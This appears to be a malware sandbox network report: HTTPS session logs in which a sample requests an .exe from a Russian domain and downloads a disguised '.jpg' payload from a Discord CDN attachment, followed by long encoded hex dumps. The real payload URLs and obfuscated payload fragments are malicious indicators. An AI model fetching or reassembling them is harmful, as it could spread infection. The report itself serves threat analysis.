                                                                                                                          2021-10-29 15:06:46 UTC1605INData Raw: 57 20 50 7a 20 6b 20 50 73 55 20 4f 20 50 6c 73 20 6c 20 50 6b 20 6b 20 50 6c 20 73 20 7a 55 20 42 20 50 6b 20 6b 20 73 7a 20 73 20 73 73 57 20 4f 20 50 4f 20 6b 20 73 4f 4f 20 73 20 50 55 55 20 57 20 50 4f 20 6b 20 42 6c 20 4c 20 50 4f 57 20 4f 20 50 4f 20 6b 20 50 4c 4f 20 73 20 50 4f 57 20 4f 20 50 6b 20 6b 20 50 42 6b 20 4c 20 7a 55 20 42 20 42 20 6b 20 50 50 73 20 4c 20 73 50 50 20 42 20 42 20 6b 20 50 4c 42 20 4c 20 4f 4f 20 50 20 50 4f 20 6b 20 73 73 4c 20 73 20 73 4c 7a 20 4f 20 42 20 6b 20 50 7a 4f 20 4c 20 4f 4f 20 50 20 50 6b 20 6b 20 55 73 20 4c 20 50 7a 6b 20 42 20 50 6b 20 6b 20 50 55 42 20 73 20 73 57 6b 20 42 20 50 6b 20 6b 20 50 57 57 20 73 20 73 73 57 20 4f 20 50 6b 20 6b 20 50 50 20 4c 20 7a 55 20 42 20 50 6b 20 6b 20 50 6c 6c 20 73 20
                                                                                                                          Data Ascii: W Pz k PsU O Pls l Pk k Pl s zU B Pk k sz s ssW O PO k sOO s PUU W PO k Bl L POW O PO k PLO s POW O Pk k PBk L zU B B k PPs L sPP B B k PLB L OO P PO k ssL s sLz O B k PzO L OO P Pk k Us L Pzk B Pk k PUB s sWk B Pk k PWW s ssW O Pk k PP L zU B Pk k Pll s
                                                                                                                          2021-10-29 15:06:46 UTC1621INData Raw: 4c 42 20 50 57 7a 20 73 4c 42 20 50 4c 6c 20 50 4f 73 20 73 4c 42 20 50 4c 6c 20 50 4c 55 20 73 4c 42 20 50 4c 42 20 50 7a 73 20 73 4c 42 20 50 4c 42 20 50 42 6b 20 73 4c 42 20 50 4c 6c 20 50 57 57 20 73 4c 42 20 50 4c 42 20 50 57 42 20 73 4c 42 20 50 4c 42 20 50 7a 4f 20 73 4c 42 20 50 4c 42 20 50 57 6c 20 73 4c 42 20 50 4c 42 20 50 57 73 20 73 4c 42 20 50 4c 6c 20 50 4c 7a 20 6b 20 73 73 7a 20 50 7a 50 20 50 42 73 20 73 73 7a 20 50 7a 73 20 50 4f 6b 20 73 73 7a 20 50 7a 73 20 50 4c 73 20 73 73 7a 20 50 7a 50 20 50 6c 73 20 73 73 7a 20 50 7a 50 20 50 6c 6c 20 73 73 7a 20 50 7a 50 20 50 57 55 20 73 73 7a 20 50 7a 73 20 50 4f 6b 20 73 73 7a 20 50 7a 50 20 50 57 55 20 73 73 7a 20 50 7a 50 20 50 42 4c 20 73 73 7a 20 50 7a 73 20 50 4f 57 20 73 73 7a 20 50 7a
                                                                                                                          Data Ascii: LB PWz sLB PLl POs sLB PLl PLU sLB PLB Pzs sLB PLB PBk sLB PLl PWW sLB PLB PWB sLB PLB PzO sLB PLB PWl sLB PLB PWs sLB PLl PLz k ssz PzP PBs ssz Pzs POk ssz Pzs PLs ssz PzP Pls ssz PzP Pll ssz PzP PWU ssz Pzs POk ssz PzP PWU ssz PzP PBL ssz Pzs POW ssz Pz
                                                                                                                          2021-10-29 15:06:46 UTC1637INData Raw: 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20 6b 20
                                                                                                                          Data Ascii: k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k k


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          3192.168.2.74981781.177.141.36443C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-10-29 15:06:47 UTC1643OUTGET /263873486.exe HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Host: iyc.jelikob.ru
                                                                                                                          2021-10-29 15:06:47 UTC1643INHTTP/1.1 403 Forbidden
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:47 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 797
                                                                                                                          Connection: close
                                                                                                                          2021-10-29 15:06:47 UTC1643INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 66 72 61 75 64 22 20 64 61 74 61 2d 76 65 72 73 69 6f 6e 3d 22 31 2e 31 31 2e 32 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 a4 d0 b8 d1 88 d0 b8 d0 bd d0 b3 d0 be d0 b2 d1 8b d0 b9 20 d1 81 d0 b0 d0 b9 d1 82 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 2f 74 69 74 6c 65 3e
                                                                                                                          Data Ascii: <!DOCTYPE html><html data-page="fraud" data-version="1.11.2"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> </title>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          4192.168.2.749830162.159.134.233443C:\Users\user\AppData\Local\Temp\3113.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-10-29 15:07:00 UTC1644OUTGET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1
                                                                                                                          Host: cdn.discordapp.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2021-10-29 15:07:00 UTC1644INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:00 GMT
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 1023400
                                                                                                                          Connection: close
                                                                                                                          CF-Ray: 6a5d4f9f488a6927-FRA
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Age: 268316
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          ETag: "a79ffe2a90ab83e54cd38dd94a2b6a6d"
                                                                                                                          Expires: Sat, 29 Oct 2022 15:07:00 GMT
                                                                                                                          Last-Modified: Tue, 26 Oct 2021 11:56:33 GMT
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                          Cf-Bgj: h2pri
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          x-goog-generation: 1635249393939568
                                                                                                                          x-goog-hash: crc32c=mLSBFQ==
                                                                                                                          x-goog-hash: md5=p5/+KpCrg+VM043ZSitqbQ==
                                                                                                                          x-goog-metageneration: 1
                                                                                                                          x-goog-storage-class: STANDARD
                                                                                                                          x-goog-stored-content-encoding: identity
                                                                                                                          x-goog-stored-content-length: 1023400
                                                                                                                          X-GUploader-UploadID: ADPycduXLAU0rhkOYYdjTYv8nzQOrUiGMR0rq3qWR-Mu3t2dKo7sgrujSRwPDi2ARPYGwmCnqDDiBBlucDqiDRky3RaT0EIS3w
                                                                                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eaMFA2p794cXeN6zoLIdvF4g2zCYrvl6t6VXhA3s1AUuCsnehbRCLAan2%2F8WOjab%2B4gkeAyy2Prk27Q2cKM01S%2FZ99ZKgw4Ld5rkiq%2FR74vLoON1OFeyv%2FWH3kQZFdyHSlCU7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          2021-10-29 15:07:00 UTC1645INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                          Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                          2021-10-29 15:07:00 UTC1645INData Raw: 78 4f 6f 45 4b 59 52 74 6b 51 2d 74 74 20 51 78 20 4f 4b 4b 20 78 20 45 20 78 20 78 20 78 20 4b 20 78 20 78 20 78 20 6f 59 59 20 6f 59 59 20 78 20 78 20 4f 6b 4b 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 52 4b 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 4f 6f 6b 20 78 20 78 20 78 20 4f 4b 20 45 4f 20 4f 6b 52 20 4f 4b 20 78 20 4f 6b 78 20 51 20 6f 78 59 20 45 45 20 4f 6b 4b 20 4f 20 74 52 20 6f 78 59 20 45 45 20 6b 4b 20 4f 78 4b 20 4f 78 59 20 4f 4f 59 20 45 6f 20 4f 4f 6f 20 4f 4f 4b 20 4f 4f 4f 20 4f 78 45 20 4f 4f 4b 20 51 74 20 4f 78 51 20 45 6f 20 51 51 20 51 74 20 4f 4f 78 20 4f
                                                                                                                          Data Ascii: xOoEKYRtkQ-tt Qx OKK x E x x x K x x x oYY oYY x x OkK x x x x x x x RK x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x Ook x x x OK EO OkR OK x Okx Q oxY EE OkK O tR oxY EE kK OxK OxY OOY Eo OOo OOK OOO OxE OOK Qt OxQ Eo QQ Qt OOx O
                                                                                                                          2021-10-29 15:07:00 UTC1646INData Raw: 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 6f 59 20 4b 78 20 6f 6f 51 20 4f 78 51 20 4f 4f 59 20 59 78 20 4b 6b 20 59 78 20 59 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 4b 52 20 4f 4b 45 20 59 78 20 4b 6b 20 4f 45 6b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 4f 6f 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59
                                                                                                                          Data Ascii: x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x oY Kx ooQ OxQ OOY Yx Kk Yx Yx kK OOK OOt OKR OKE Yx Kk OEk YK kK OOK OOt OxQ OOo Yx OOo Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Y
                                                                                                                          2021-10-29 15:07:00 UTC1648INData Raw: 20 4f 78 20 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 45 6f 20 4f 6b 45 20 59 59 20 6b 4b 20 4f 4f 4b 20 6b 59 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 6b 4b 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 6b 20 59 4b 20 6b 4b 20 4f 6b 20 51 4f 20 45 4f 20 45 20 52 4b 20 6b 45 20 59 78 20 59 4b 20 6b 4b 20 4f 74 6b 20 4f 4f 6b 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 4b 78 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 51 78 20 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 59 45 20 4f 78 51
                                                                                                                          Data Ascii: Ox O OxQ OOo Yx OEo OkE YY kK OOK kY OxQ OOo Yx OkK YO YK kK OOk OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Ok YK kK Ok QO EO E RK kE Yx YK kK Otk OOk OxQ OOo Yx oKx YO YK kK OOk OOt OxQ OOo OQx KQ Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK YE OxQ
                                                                                                                          2021-10-29 15:07:00 UTC1649INData Raw: 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f
                                                                                                                          Data Ascii: OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo
                                                                                                                          2021-10-29 15:07:00 UTC1650INData Raw: 4f 78 51 20 4f 4f 6f 20 59 52 20 45 51 20 45 74 20 4b 74 20 6f 4f 74 20 4b 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 6f 45 20 45 6b 20 52 4b 20 59 59 20 6b 4b 20 4f 4f 4b 20 59 20 45 4f 20 4b 4f 20 59 78 20 4b 6b 20 52 52 20 74 6f 20 74 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6b 6b 20 4b 59 20 4b 6b 20 59 78 20 52 78 20 6f 4b 52 20 6b 74 20 51 6b 20 45 4f 20 4f 20 59 78 20 4b 6b 20 52 52 20 52 6b 20 6f 59 4f 20 4f 4f 4b 20 4f 4f 74 20 6f 51 20 4f 4b 20 4b 4b 20 4b 6b 20 59 78 20 52 78 20 4f 6f 4b 20 4f 78 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 4f 4b 4b 20 6f 4f 20 4b 6f 20 52 6b 20 4f 4b 74 20 4f 4f 4b 20 4f 4f 74 20 6f 51 20 6f 20 59 45 20 4b 51 20 59 78 20 74 78 20 4b 6f 20 4f 78 6b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 4b 74 20 59 78 20
                                                                                                                          Data Ascii: OxQ OOo YR EQ Et Kt oOt Ko OOt OxQ OOE oE Ek RK YY kK OOK Y EO KO Yx Kk RR to tK OOK OOt OxE kk KY Kk Yx Rx oKR kt Qk EO O Yx Kk RR Rk oYO OOK OOt oQ OK KK Kk Yx Rx OoK OxQ OOt OxQ Ooo OKK oO Ko Rk OKt OOK OOt oQ o YE KQ Yx tx Ko Oxk OOt OxQ Ooo oR Kt Yx
                                                                                                                          2021-10-29 15:07:00 UTC1652INData Raw: 74 6b 20 6f 78 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 52 51 20 4f 4f 4b 20 59 78 20 4b 6b 20 6f 59 20 6b 51 20 4f 4f 6f 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 74 20 59 59 20 45 45 20 59 4b 20 6f 78 78 20 6b 6f 20 4f 52 4b 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 52 59 20 45 78 20 59 78 20 59 4b 20 51 4b 20 4f 6f 20 4f 45 51 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4f 20 45 4f 20 45 45 20 4f 4f 4b 20 4f 6f 20 4f 4b 6f 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 78 52 20 59 6f 20 6f 45 59 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 45 78 20 51 59 20 59 78 20 4b 6b 20 59 52 20 4f 51 20 6f 4f 6f 20 4f 4b 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 52 20 59 4f 20 59 78 20 59 4b 20 4f 6f 74 20 6f 51 20 51 59 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 45 45 20 59 59 20 45 51 20 6b
                                                                                                                          Data Ascii: tk oxE kK OOK OOE RQ OOK Yx Kk oY kQ OOo OOY OOt Oxt Qt YY EE YK oxx ko ORK OOR OxQ OOk RY Ex Yx YK QK Oo OEQ OxQ OOo YK oO EO EE OOK Oo OKo OxQ OOo YK oxR Yo oEY kY OOK OOY Ex QY Yx Kk YR OQ oOo OKx OOt OxQ OOR oR YO Yx YK Oot oQ QY Oxk OOo Yo EE YY EQ k
                                                                                                                          2021-10-29 15:07:00 UTC1653INData Raw: 20 4f 78 51 20 4f 6f 6f 20 52 59 20 6b 20 59 78 20 59 4b 20 51 4b 20 51 78 20 74 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 51 20 59 45 20 45 78 20 4f 4f 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 45 20 59 45 20 59 4b 20 52 45 20 6f 45 59 20 4f 6f 74 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 6f 52 20 59 52 20 59 78 20 59 4b 20 6b 6f 20 4f 6f 52 20 4f 4f 4b 20 45 78 20 6f 4f 51 20 59 78 20 4b 6b 20 59 6f 20 45 74 20 6b 78 20 51 51 20 4f 4f 45 20 4f 4f 45 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 6f 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 45 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 74 59 20 4f 78 6f 20 45 45 20
                                                                                                                          Data Ascii: OxQ Ooo RY k Yx YK QK Qx tR OxQ OOo YR YQ YE Ex OOx OOK OOt OxE QE YE YK RE oEY Oot OOY OOt OxQ OOK oR YR Yx YK ko OoR OOK Ex oOQ Yx Kk Yo Et kx QQ OOE OOE oYE OxK Kk Yx YY OOE ORo ooo OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk QE OEY kK OOK OOY tY Oxo EE
                                                                                                                          2021-10-29 15:07:00 UTC1654INData Raw: 6f 20 59 78 20 4b 6b 20 59 6f 20 59 4b 20 6b 4b 20 4f 4f 4b 20 45 6b 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 4f 78 59 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 52 4f 20 4b 6b 20 59 78 20 59 59 20 74 51 20 52 52 20 4f 4f 59 20 4f 78 51 20 59 6f 20 4b 6b 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 45 78 20 74 51 20 59 78 20 4b 6b 20 59 52 20 52 78 20 6b 52 20 4f 4f 4f 20 6f 4b 6b 20 59 59 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 6f 45 78 20 4f 4b 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 6b 6b 20 59 20 4b 6b 20 59 78 20 52 78 20 45 51 20 74 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 51 20 59 78 20 59 4b 20 51 4b 20 4f 6f 4f 20 4f 4f 4b 20 52 51 20 74 4b 20 59 78 20 4b 6b 20 59 52 20 6f 74 20 6b 45
                                                                                                                          Data Ascii: o Yx Kk Yo YK kK OOK Ek Oxk OOo Yx OxY YO YK kK OOE OOt OxQ OOo RO Kk Yx YY tQ RR OOY OxQ Yo Kk Kk Yx YE kK OOK Oxx Ex tQ Yx Kk YR Rx kR OOO oKk YY OOo Yx KQ oE oEx OKx OOK OOt OxY kk Y Kk Yx Rx EQ tK OOt OxQ Ooo oR Q Yx YK QK OoO OOK RQ tK Yx Kk YR ot kE
                                                                                                                          2021-10-29 15:07:00 UTC1656INData Raw: 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 6f 4f 4b 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 51 45 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 4f 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 20 74 6f 20 59 4f 20 4b 6b 20 59 6f 20 45 51 20 6b 45 20 51 51 20 4f 4f 45 20 4f 6f 4b 20 4f 4f 74 20 4b 59 20 52 45 20 4f 51 4f 20 4f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 74 6f 20 4f 52 78 20 4f 59 59 20 4b 6b 20 59 78 20 59 78 20 4f 6f 4b 20 52 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 52 59 20 6b 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 6f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 59 52 20 6f 52 20 4b 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 6f
                                                                                                                          Data Ascii: OK OOK OOt Oxk kY ooR oOK Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR OQE OOo Yx YK QE OE kK OOK Oot o to YO Kk Yo EQ kE QQ OOE OoK OOt KY RE OQO Oxk kK OOK OOR to ORx OYY Kk Yx Yx OoK RQ OOt OxQ Ooo RY k Yx YK QK oQ oOt OxQ OOo Yo YR oR Kk kK OOK OOY o
                                                                                                                          2021-10-29 15:07:00 UTC1657INData Raw: 45 20 4b 4f 20 4f 6b 74 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 4f 45 6f 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 51 45 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 4f 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 6f 52 20 4f 4f 51 20 45 59 20 59 59 20 4b 45 20 4f 6b 74 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 4f 59 51 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 45 4f 20 4b 4f 20 52 51 20 4f 4f 74 20 4f 78 6b 20 6f 6f 4b 20 4b 6f 20 59 78 20 4b 6b 20 59 4f 20 4f 51 20 4f 45 6f
                                                                                                                          Data Ascii: E KO Okt OK OOK OOt Oxk kY ooR OEo Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR OQE OOo Yx YK QE OE kK OOK Oot OoR OOQ EY YY KE Okt OK OOK OOt Oxk kY ooR OYQ Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR KY OOo Yx Yk EO KO RQ OOt Oxk ooK Ko Yx Kk YO OQ OEo
                                                                                                                          2021-10-29 15:07:00 UTC1658INData Raw: 59 20 59 59 20 4f 4b 20 52 51 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 78 78 20 45 45 20 59 4b 20 45 59 20 59 78 20 52 51 20 4f 4f 51 20 4f 78 52 20 4f 6f 78 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 4f 59 74 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 78 4f 20 6b 6b 20 59 6f 20 4b 6b 20 59 78 20 4b 6b 20 45 6b 20 4f 20 4f 4f 51 20 4f 78 51 20 78 20 74 52 20 4b 52 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 4f 78 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 45 59 20 59 45 20 52 51 20 4f 52 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 51 20 59 6b 20 45 45 20 59 6b 20 45 51 20 6b 78 20 51 51 20 4f
                                                                                                                          Data Ascii: Y YY OK RQ OOY OOt OxQ Oxx EE YK EY Yx RQ OOQ OxR Oox oYE OxK Kk Yx YY OOE ORo OYt OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk QE OYK kK OOK OOY OxO kk Yo Kk Yx Kk Ek O OOQ OxQ x tR KR Yx YK QK oQ OxR OxQ OOo YR EY YE RQ OR OOY OOt Oxt QQ Yk EE Yk EQ kx QQ O
